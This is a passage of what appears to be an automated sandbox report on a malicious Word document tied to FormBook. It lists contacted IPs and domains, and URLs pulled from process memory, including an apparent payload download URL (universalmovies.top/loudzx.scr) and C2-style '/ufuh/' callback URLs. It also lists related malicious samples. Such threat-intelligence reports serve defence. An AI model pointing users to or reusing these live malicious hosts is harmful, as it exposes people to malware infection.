            http://www.primeplay88.org/ufuh/?84O0=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&-Hc=N8_LbDFHuLL4ejZtrue
            • Avira URL Cloud: safe
            		unknown
            http://www.kinkynerdspro.blog/ufuh/?84O0=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&-Hc=N8_LbDFHuLL4ejZfalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabdfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://universalmovies.top/vEQNEDT32.EXE, 00000002.00000002.359979447.0000000000680000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            		unknown
            https://duckduckgo.com/ac/?q=dfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://static.loopia.se/responsive/images/iOS-72.pngdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://static.loopia.se/shared/logo/logo-loopia-white.svgdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwedfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.aceautocorp.comsQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635242428.0000000000AD5000.00000040.80000000.00040000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.searchvity.com/?dn=dfrgui.exe, 00000008.00000002.636013778.0000000002EC6000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003946000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.478820963.0000000000BF6000.00000004.80000000.00040000.00000000.sdmpfalse
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.sqlite.org/copyright.html.dfrgui.exe, 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.drfalse
            • URL Reputation: safe
            		unknown
            https://static.loopia.se/shared/images/additional-pages-hero-shape.webpdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://static.loopia.se/shared/style/2022-extra-pages.cssdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://universalmovies.top/loudzx.scrjEQNEDT32.EXE, 00000002.00000002.359979447.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            		unknown
            https://static.loopia.se/responsive/images/iOS-114.pngdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchdfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
            • URL Reputation: safe
            		unknown
            http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://static.loopia.se/responsive/styles/reset.cssdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.google.com/favicon.ico13d6pS3.8.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://ac.ecosia.org/autocomplete?q=dfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
            • URL Reputation: safe
            		unknown
            https://static.loopia.se/responsive/images/iOS-57.pngdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://universalmovies.top/loudzx.scrkkC:EQNEDT32.EXE, 00000002.00000002.359979447.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            		unknown
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://universalmovies.top/EQNEDT32.EXE, 00000002.00000002.359979447.0000000000680000.00000004.00000020.00020000.00000000.sdmpfalse
            • 21%, Virustotal, Browse
            • Avira URL Cloud: phishing
            		unknown
            http://www.searchvity.com/dfrgui.exe, 00000008.00000002.636013778.0000000002EC6000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003946000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.478820963.0000000000BF6000.00000004.80000000.00040000.00000000.sdmpfalse
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=padfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=padfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkindfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
            • URL Reputation: safe
            		unknown
            http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=padfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebdfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://aceautocorp.com/ufuh/?-Hc=N8_LbDFHuLL4ejZ&84O0=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmtodfrgui.exe, 00000008.00000002.636013778.00000000036A0000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000004120000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            194.9.94.86
            		www.xn--matfrmn-jxa4m.seSweden
            		39570LOOPIASEtrue
            45.33.6.223
            		www.sqlite.orgUnited States
            		63949LINODE-APLinodeLLCUSfalse
            104.21.74.191
            		universalmovies.topUnited States
            		13335CLOUDFLARENETUStrue
            198.12.241.35
            		aceautocorp.comUnited States
            		26496AS-26496-GO-DADDY-COM-LLCUStrue
            54.38.220.85
            		www.kinkynerdspro.blogFrance
            		16276OVHFRfalse
            91.195.240.19
            		parkingpage.namecheap.comGermany
            		47846SEDO-ASDEtrue
            66.96.161.166
            		www.terelprime.comUnited States
            		29873BIZLAND-SDUStrue

            Private

            IP
            192.168.2.255

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1444130
            Start date and time:2024-05-20 08:52:46 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 10m 21s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:14
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:2
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Doc PI.doc
            Detection:MAL
            Classification:mal100.troj.spyw.expl.evad.winDOC@11/16@13/8
            EGA Information:
            • Successful, ratio: 60%
            HCA Information:
            • Successful, ratio: 89%
            • Number of executed functions: 71
            • Number of non-executed functions: 190
            Cookbook Comments:
            • Found application associated with file extension: .doc
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Scroll down
            • Close Viewer

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
            • Execution Graph export aborted for target EQNEDT32.EXE, PID 1596 because there are no executed function
            • Execution Graph export aborted for target sQNFFcxirzZbXqUULewCRS.exe, PID 2952 because it is empty
            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtEnumerateKey calls found.
            • Report size getting too big, too many NtEnumerateValueKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            02:53:34API Interceptor371x Sleep call for process: EQNEDT32.EXE modified
            02:53:41API Interceptor22x Sleep call for process: loud89334.scr modified
            02:54:14API Interceptor3143x Sleep call for process: sQNFFcxirzZbXqUULewCRS.exe modified
            02:54:27API Interceptor2327698x Sleep call for process: dfrgui.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            194.9.94.86Beauty_Stem_Invoice.docGet hashmaliciousFormBookBrowse
            • www.xn--matfrmn-jxa4m.se/ufuh/
            MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
            • www.xn--matfrmn-jxa4m.se/ufuh/
            SalinaGroup.docGet hashmaliciousFormBookBrowse
            • www.xn--matfrmn-jxa4m.se/ufuh/
            PAY-0129.exeGet hashmaliciousFormBookBrowse
            • www.torentreprenad.com/s2u9/?7H=mTJ4yhH&qHaT0h=5U7DALWrxqzr56VTS66DkMzivwb8eJw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH0jqi0U2E5YHFFFQ==
            DHL_SOA_1004404989.exeGet hashmaliciousFormBookBrowse
            • www.torentreprenad.com/s2u9/?j8j=6NzlX4xHmtqH&rR=5U7DALWrxqzr56VMLK7KnfayygnCZIw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH3pN+aCUsxPyV8FA==
            Scan00516.jsGet hashmaliciousFormBook, MailPassView, WSHRATBrowse
            • www.acre-com.com/me15/?i8O=bxl0&VPudI=AMxDUnLLexuTfXRuHqoxzPfeXrfBw2lKu15RcCpXpuJEBCulcUbatn2YVJ6xbnCfmbZZ
            SHIPPINGDOCUMENTS.25.23.exeGet hashmaliciousFormBookBrowse
            • www.udda.app/ga36/?-Zk4Ah=uKy05ssFXwD7lx+pwOkpcz0JYvvlr0Fm4k7Q090T/1T8NUAbWqhr3VP8iMZHhaUYUaRp&-ZVd=5jo8nLy8
            g8G146l8XU.exeGet hashmaliciousFormBookBrowse
            • www.frostdal.se/s26y/?8pAlmdiX=882d78zUy4+UMlJ0mFcKU0FzzswBpgbUl63S0CTJJ7YYOy24S5YeYqbYAzkKlVaYLwFJ&h0DxKN=l4G4b
            Portfunktionen.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • www.seansaren.com/8mkm/?YfxdA=0TBXZr6&8p9dCJU=dq4Bmr7ke09F/j6gqFBYy8hUF+OUtSAKtvg3uyO8Hql2Nxy80d4gIJwQmfcVpJqaQnb4Hw97lY925H1T11NKL9RBbHv3rBHVxw==
            shdybron2.1.exeGet hashmaliciousFormBookBrowse
            • www.giftr.online/sk29/?4hHxFhL=kIJ0w1eRhzsxIkY2EDI0ouQu9gQ5uAgdx+JFieQVw6ZUYc+rFfN6m9UPXTH9XP8rHUyw&n0=cRkX
            45.33.6.223APR0927,24.docGet hashmaliciousFormBookBrowse
            • www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
            Enquiry List.xlsGet hashmaliciousFormBookBrowse
            • www.sqlite.org/2017/sqlite-dll-win32-x86-3190000.zip
            ITEMS.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
            • www.sqlite.org/2017/sqlite-dll-win32-x86-3160000.zip
            TT swift copy.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
            • www.sqlite.org/2018/sqlite-dll-win32-x86-3220000.zip
            Beauty_Stem_Invoice.docGet hashmaliciousFormBookBrowse
            • www.sqlite.org/2016/sqlite-dll-win32-x86-3130000.zip
            APRILPR, 24.docGet hashmaliciousFormBookBrowse
            • www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip
            Credit confirmation.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
            • www.sqlite.org/2016/sqlite-dll-win32-x86-3110000.zip
            Demand G2-2024.xlsxGet hashmaliciousFormBookBrowse
            • www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip
            PAYROLL.docGet hashmaliciousFormBookBrowse
            • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
            PAYROLL.docGet hashmaliciousFormBookBrowse
            • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            parkingpage.namecheap.comRE Draft BL for BK#440019497 REF#388855.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            file.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            file.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            IO23806Dwj.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            Konstabelens65.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 91.195.240.19
            Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsmGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 91.195.240.19
            Vibrant Purchase Order 1624.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            F24-005880.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 91.195.240.19
            WaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 91.195.240.19
            www.xn--matfrmn-jxa4m.seopszx.scr.exeGet hashmaliciousFormBookBrowse
            • 194.9.94.85
            Beauty_Stem_Invoice.docGet hashmaliciousFormBookBrowse
            • 194.9.94.86
            MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
            • 194.9.94.86
            SalinaGroup.docGet hashmaliciousFormBookBrowse
            • 194.9.94.86
            NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
            • 194.9.94.85
            alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
            • 194.9.94.85
            AWB5889829680.scr.exeGet hashmaliciousFormBookBrowse
            • 194.9.94.85
            Search.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • 194.9.94.85
            universalmovies.topPO051524.docGet hashmaliciousUnknownBrowse
            • 104.21.74.191
            Scanned doc 03945.docGet hashmaliciousAgentTeslaBrowse
            • 104.21.74.191
            GENERALGROUP INV FWDRB42024.docGet hashmaliciousLokibotBrowse
            • 104.21.74.191
            Revised PI.docGet hashmaliciousLokibotBrowse
            • 104.21.74.191
            Signed contract-009988876.docGet hashmaliciousUnknownBrowse
            • 104.21.74.191
            PAYMENT SLIP.docGet hashmaliciousAgentTeslaBrowse
            • 172.67.162.95
            PAYROLL.docGet hashmaliciousFormBookBrowse
            • 172.67.162.95
            MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
            • 104.21.74.191
            APR PAYROLL.docGet hashmaliciousFormBookBrowse
            • 172.67.162.95
            tee030.docGet hashmaliciousFormBookBrowse
            • 104.21.74.191

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUShttps://viewer.solutiondocondemand.com/ViewerElectronicInvoice.aspx?t=KNnZNtGHDZ10ZfWZwOKyGZpzb6185xhEhgnCUrh1mM%2fnt8pIdjfupJkm7bJMIBfyuPGNYOvu0jmDH%2f875R8wD0jPTltxq83FPj7NDTN1hDIphdptMFCaRm36ZWiXdKBrfEYco5jQj1pxIX9nBJN2OXw4rtsRlTcSx9EI3nxthnk%3dGet hashmaliciousUnknownBrowse
            • 104.17.25.14
            PURCHASE ORDER_REQUEST.xla.xlsxGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            IMG_1058_1060_200.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 104.26.12.205
            PON2401071.xlsGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            file.exeGet hashmaliciousFormBookBrowse
            • 188.114.97.3
            Pro_Samples.exeGet hashmaliciousGuLoaderBrowse
            • 104.26.12.205
            SAMPLES.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 104.26.13.205
            PDA-APPOINTMENT-LETTER-DOCX.exeGet hashmaliciousFormBookBrowse
            • 23.227.38.32
            mtJ8kjHpyC.exeGet hashmaliciousLummaCBrowse
            • 188.114.97.3
            yiiz2LXhgH.exeGet hashmaliciousXehook StealerBrowse
            • 172.67.137.239
            LOOPIASEopszx.scr.exeGet hashmaliciousFormBookBrowse
            • 194.9.94.85
            Beauty_Stem_Invoice.docGet hashmaliciousFormBookBrowse
            • 194.9.94.86
            MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
            • 194.9.94.86
            SalinaGroup.docGet hashmaliciousFormBookBrowse
            • 194.9.94.86
            NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
            • 194.9.94.85
            alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
            • 194.9.94.85
            AWB5889829680.scr.exeGet hashmaliciousFormBookBrowse
            • 194.9.94.85
            Search.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • 194.9.94.85
            PAY-0129.exeGet hashmaliciousFormBookBrowse
            • 194.9.94.86
            PgbcaAGOnA.exeGet hashmaliciousFormBookBrowse
            • 194.9.94.85
            LINODE-APLinodeLLCUShttps://update.greasyfork.org/scripts/465276/Quillbot%20Premium%20Unlocker.user.jsGet hashmaliciousUnknownBrowse
            • 104.200.27.49
            APR0927,24.docGet hashmaliciousFormBookBrowse
            • 45.33.6.223
            https://iamgold24-recruter.smartforum.xyz/Get hashmaliciousUnknownBrowse
            • 172.104.29.90
            #U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U0444#U0435#U0432#U0440#U0430#U043b#U044c.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • 69.164.202.216
            #U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U043c#U0430#U0440#U0442.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • 69.164.202.216
            Enquiry List.xlsGet hashmaliciousFormBookBrowse
            • 45.33.6.223
            F24-005880.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 139.162.5.234
            https://r.smtp.trigo-group.com/tr/cl/CBGKWYvZX69yjWPT37xjiRDs0ipDAaLpCa74PKuiDdx7ExEQuiEblFXTFKDc3blIDcAXwnYNApbw16f7wfP6wMMIKznDLhbdkS5jcYTG9wPXeTi8SAYRDRpKqChs5CNI-TO2z4Ri34kk3VpCF6JG3KZ0QqiZoRuQstlaMLYb_zUKzoaduInVMoj1kFoe6G9nZ8A-22oA2DIU1Nd5HKYnPYMoprzEjs25VEhkBeJp7yF_l7oEijW-k0fA46X841_7H9v91YXsYFXSiGj8KKjNhDc7m7su3uu4Way0uR9heCdQrJ_-kfuQao2bGVAbwvyORQVrw3-RfjmZlcrRWy6TppkilvzGDj0efH_xS7eHf2Cp-QXFysgkVoCmq11ssD87WnXg1G-9jKhqwlqcl9V6tnmrEDwVpAGo6k_VrxT2UzA8h1voM_JeZh5ipVaCCvF8mqIALBNkHkNAmM4JKQIeoK9EpBco73rkbiUNqm_eF0G3CwOyfNkEk_WmDedL8dUnpm-eeqyHdS-_7AC-bhEFGBP3dv130D2y_oLLXbljqpsYMI6_SW_3bzDvOPIrPwauy-B_Sk5foFtPDDso7hhtHuGA0_p6nmWayqq-QVLn_aKGKAGet hashmaliciousUnknownBrowse
            • 45.33.2.79
